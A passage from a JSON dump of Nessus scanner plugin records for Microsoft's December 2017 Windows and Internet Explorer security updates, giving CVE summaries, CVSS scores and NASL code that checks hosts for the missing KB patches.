value:\"MS17-4054522\");\n script_xref(name:\"MSFT\", value:\"MS17-4054519\");\n\n script_name(english:\"Windows 8.1 and Windows Server 2012 R2 December 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4054522\nor cumulative update 4054519. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912,\n CVE-2017-11930)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\");\n # https://support.microsoft.com/en-us/help/4054522/windows-81-update-kb4054522\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1020239a\");\n # https://support.microsoft.com/en-us/help/4054519/windows-81-update-kb4054519\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?18bd5547\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4054522 or Cumulative update KB4054519.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-12\";\nkbs = make_list('4054522', '4054519');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"12_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4054522, 4054519])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:41:32", "description": "The Internet Explorer installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912, CVE-2017-11930)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the scripting engine does not properly handle objects in memory in Microsoft browsers. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "Security Updates for Internet Explorer (December 2017)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11890", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11919", "CVE-2017-11930"], "modified": "2018-07-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_DEC_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/105188", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105188);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/07/30 15:31:34\");\n\n script_cve_id(\n \"CVE-2017-11886\",\n \"CVE-2017-11887\",\n \"CVE-2017-11890\",\n \"CVE-2017-11894\",\n \"CVE-2017-11895\",\n \"CVE-2017-11901\",\n \"CVE-2017-11903\",\n \"CVE-2017-11906\",\n \"CVE-2017-11907\",\n \"CVE-2017-11912\",\n \"CVE-2017-11913\",\n \"CVE-2017-11919\",\n \"CVE-2017-11930\"\n );\n script_bugtraq_id(\n 102045,\n 102046,\n 102047,\n 102053,\n 102054,\n 102058,\n 102062,\n 102063,\n 102078,\n 102082,\n 102091,\n 102092,\n 102093\n );\n\n script_xref(name:\"MSKB\", value:\"4054520\");\n script_xref(name:\"MSKB\", value:\"4052978\");\n script_xref(name:\"MSKB\", value:\"4054519\");\n script_xref(name:\"MSKB\", value:\"4054518\");\n script_xref(name:\"MSFT\", value:\"MS17-4054520\");\n script_xref(name:\"MSFT\", value:\"MS17-4052978\");\n script_xref(name:\"MSFT\", value:\"MS17-4054519\");\n script_xref(name:\"MSFT\", value:\"MS17-4054518\");\n\n script_name(english:\"Security Updates for Internet Explorer (December 2017)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11895, CVE-2017-11912,\n CVE-2017-11930)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n scripting engine does not properly handle objects in\n memory in Microsoft browsers. An attacker who\n successfully exploited the vulnerability could obtain\n information to further compromise the users system.\n (CVE-2017-11919)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\");\n # https://support.microsoft.com/en-us/help/4054520/windows-server-2012-update-kb4054520\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?47a822ee\");\n # https://support.microsoft.com/en-us/help/4052978/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b8a7a2b3\");\n # https://support.microsoft.com/en-us/help/4054519/windows-81-update-kb4054519\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?18bd5547\");\n # https://support.microsoft.com/en-us/help/4054518/windows-7-update-kb4054518\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?db8ca30f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB4054520\n -KB4052978\n -KB4054519\n -KB4054518\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-12';\nkbs = make_list(\n '4054518',\n '4054520',\n '4054519',\n '4052978'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.18860\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4052978\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22314\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4052978\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.18860\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4052978\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21084\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4052978\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4052978 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4054519 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-12', kb:'4054519', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4054520 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-12', kb:'4054520', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4054518 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-12', kb:'4054518', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:40:56", "description": "The remote Windows host is missing security update 4054523 or cumulative update 4054520. It is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11912)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-11886, CVE-2017-11890, CVE-2017-11901, CVE-2017-11903, CVE-2017-11907, CVE-2017-11913)", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "Windows Server 2012 December 2017 Security Updates", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885", "CVE-2017-11886", "CVE-2017-11887", "CVE-2017-11890", "CVE-2017-11894", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11906", "CVE-2017-11907", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11927"], "modified": "2019-11-12T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_DEC_4054520.NASL", "href": "https://www.tenable.com/plugins/nessus/105186", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105186);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-11885\",\n \"CVE-2017-11886\",\n \"CVE-2017-11887\",\n \"CVE-2017-11890\",\n \"CVE-2017-11894\",\n \"CVE-2017-11901\",\n \"CVE-2017-11903\",\n \"CVE-2017-11906\",\n \"CVE-2017-11907\",\n \"CVE-2017-11912\",\n \"CVE-2017-11913\",\n \"CVE-2017-11927\"\n );\n script_bugtraq_id(\n 102045,\n 102046,\n 102047,\n 102053,\n 102055,\n 102062,\n 102063,\n 102078,\n 102082,\n 102091,\n 102092,\n 102095\n );\n script_xref(name:\"MSKB\", value:\"4054520\");\n script_xref(name:\"MSKB\", value:\"4054523\");\n script_xref(name:\"MSFT\", value:\"MS17-4054520\");\n script_xref(name:\"MSFT\", value:\"MS17-4054523\");\n\n script_name(english:\"Windows Server 2012 December 2017 Security Updates\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4054523\nor cumulative update 4054520. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in RPC if\n the server has Routing and Remote Access enabled. An\n attacker who successfully exploited this vulnerability\n could execute code on the target system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2017-11885)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11894, CVE-2017-11912)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11887, CVE-2017-11906)\n\n - An information disclosure vulnerability exists when the\n Windows its:// protocol handler unnecessarily sends\n traffic to a remote site in order to determine the zone\n of a provided URL. This could potentially result in the\n disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11886,\n CVE-2017-11890, CVE-2017-11901, CVE-2017-11903,\n CVE-2017-11907, CVE-2017-11913)\");\n # https://support.microsoft.com/en-us/help/4054520/windows-server-2012-update-kb4054520\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?47a822ee\");\n # https://support.microsoft.com/en-us/help/4054523/windows-server-2012-update-kb4054523\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba2c078e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4054523 or Cumulative update KB4054520.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11885\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS17-12\";\nkbs = make_list('4054520', '4054523');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"12_2017\",\n bulletin:bulletin,\n rollup_kb_list:[4054520, 4054523])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:40:55", "description": "The remote Windows host is missing multiple security updates released on 2017/12/12. It is, therefore, affected by multiple vulnerabilities :\n\n- An information vulnerability exists when Windows Media Player improperly discloses file information. Successful exploitation of the vulnerability could allow the attacker to test for the presence of files on disk.\n (CVE-2017-11768)\n\n - A remote code execution vulnerability exists in RPC if the server has Routing and Remote Access enabled. An attacker who successfully exploited this vulnerability could execute code on the target system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2017-11885) \n - An information disclosure vulnerability exists when the Windows its:// protocol handler unnecessarily sends traffic to a remote site in order to determine the zone of a provided URL. This could potentially result in the disclosure of sensitive information to a malicious site.\n (CVE-2017-11927)", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "nessus", "title": "Windows 2008 December 2017 Multiple Security Updates", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11768", "CVE-2017-11885", "CVE-2017-11927"], "modified": "2020-09-04T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_DEC_WIN2008.NASL", "href": "https://www.tenable.com/plugins/nessus/105191", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105191);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/04\");\n\n script_cve_id(\"CVE-2017-11768\", \"CVE-2017-11885\", \"CVE-2017-11927\");\n script_bugtraq_id(101705, 102055, 102095);\n script_xref(name:\"MSKB\", value:\"4047170\");\n script_xref(name:\"MSFT\", value:\"MS17-4047170\");\n script_xref(name:\"MSKB\", value:\"4052303\");\n script_xref(name:\"MSFT\", value:\"MS17-4052303\");\n script_xref(name:\"MSKB\", value:\"4053473\");\n script_xref(name:\"MSFT\", value:\"MS17-4053473\");\n\n script_name(english:\"Windows 2008 December 2017 Multiple Security Updates\");\n script_summary(english:\"Checks the existence of Windows Server 2008 December 2017 Patches.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing multiple security updates released\non 2017/12/12. It is, therefore, affected by multiple\nvulnerabilities :\n\n- An information vulnerability exists when Windows Media\n Player improperly discloses file information. Successful\n exploitation of the vulnerability could allow 